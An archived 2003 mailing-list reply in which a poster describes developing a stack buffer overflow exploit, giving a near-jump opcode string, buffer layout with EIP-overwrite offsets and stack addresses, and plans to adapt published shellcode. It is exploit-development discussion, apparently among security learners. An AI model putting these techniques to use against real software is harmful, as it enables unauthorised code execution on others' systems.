('binary' encoding is not supported, stored as-is) In-Reply-To: <3EA57FD0.4010603at_private> Thanks everyone for the help. Tried placing shellcode at end, seemed to not overwrite EIP anymore,strange. Next, tried using a near jump and it works great (besides the fact that I haven't got the shellcode working quite right yet). // Near jump to shellcode (approx 422 bytes, jmp near -422) char jumpcode [] = "\xE9\x55\xFE\xFF\xFF"; My total buffer (460 bytes,411-414 overwrite EIP) now looks like this (typical addresses): Top of Stack NOPS Shellcode EIP ** NOPS jump 00fbfddd fbfde9 fbfe07 fbff87 fbff88 fbff9c I am attempting to use shellcode from the "Advanced Buffer Overflow" writeup by Litchfield (I changed LoadLibrary and GetProcAddress calls to the right addresses). I'm worried that I won't have enough space(have about 400 bytes to work with) if I decided to attempt to write my own shellcode. Thanks for the assistance! I will let you know if everything goes good. David >How about just a short or near jmp? How many bytes between where EIP lands >and your shellcode? I.E. jmp -128 or something? EB 80, I think.
This archive was generated by hypermail 2b30 : Thu Apr 24 2003 - 13:00:06 PDT